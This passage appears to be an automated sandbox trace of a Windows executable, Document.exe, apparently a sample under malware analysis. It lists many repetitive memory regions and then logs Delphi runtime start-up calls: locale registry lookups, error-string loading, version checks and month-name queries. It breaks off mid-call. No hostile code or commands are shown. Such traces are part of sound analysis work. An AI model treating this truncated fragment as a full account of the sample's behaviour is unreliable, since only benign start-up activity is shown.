"pagefile_0x00000000003f0000" filename = "" Region: id = 1386 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1387 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1388 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1389 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1390 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1391 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1392 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1393 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1394 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1395 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1396 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1397 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1398 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1399 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1400 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1401 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1402 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1403 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1404 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1405 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1406 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1407 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1408 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1409 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1410 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1411 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1412 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1413 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1414 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1415 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1416 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1417 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1418 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1419 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1420 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1421 start_va = 0x4e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1422 start_va = 0x3060000 end_va = 0x332efff entry_point = 0x3060000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1423 start_va = 0x1e40000 end_va = 0x1ea4fff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 1424 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1425 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1426 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1427 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1428 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1429 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1430 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1431 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1432 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1433 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1434 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1435 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1436 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1437 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1438 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1439 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1440 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1441 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1442 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1443 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1444 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1445 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1446 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1447 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1448 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1449 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1450 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1451 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1452 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1453 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1454 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1455 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1456 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1457 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1458 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1459 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1460 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1461 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1462 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1463 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1464 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1465 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1466 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1467 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1468 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1469 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1470 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1471 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1472 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1473 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1474 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1475 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1476 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1477 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1478 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1479 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1480 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1481 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1482 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1483 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1484 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1485 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1486 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1487 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1488 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1489 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1490 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1491 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1492 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1493 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1494 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1495 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1496 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1497 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1498 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1499 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1500 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1501 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1502 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1503 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1504 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1505 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1506 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1507 start_va = 0x4f0000 end_va = 0x51afff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1524 start_va = 0x520000 end_va = 0x520fff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1525 start_va = 0x1ee0000 end_va = 0x1f0bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 1526 start_va = 0x20c0000 end_va = 0x20fffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1529 start_va = 0x530000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Thread: id = 73 os_tid = 0x600 [0165.612] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0165.612] GetKeyboardType (nTypeFlag=0) returned 4 [0165.612] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"" [0165.612] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0165.613] GetVersion () returned 0x1db10106 [0165.613] GetVersion () returned 0x1db10106 [0165.613] GetCurrentThreadId () returned 0x600 [0165.613] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0165.614] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0165.614] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0165.614] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0165.614] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0165.614] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", iMaxLength=261 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0165.614] GetThreadLocale () returned 0x409 [0165.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0165.615] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 55 [0165.615] lstrcpynA (in: lpString1=0x18f907, lpString2="ENU", iMaxLength=209 | out: lpString1="ENU") returned="ENU" [0165.615] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0165.616] lstrcpynA (in: lpString1=0x18f907, lpString2="EN", iMaxLength=209 | out: lpString1="EN") returned="EN" [0165.616] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0165.616] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0165.616] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x556350 [0165.616] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a0000 [0165.617] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x557350 [0165.617] VirtualAlloc (lpAddress=0x2a0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a0000 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffd8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffec, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0165.617] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0165.618] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0165.618] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0165.618] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76220000 [0165.619] GetProcAddress (hModule=0x76220000, lpProcName="GetDiskFreeSpaceExA") returned 0x762b434f [0165.619] GetThreadLocale () returned 0x409 [0165.619] GetThreadLocale () returned 0x409 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, 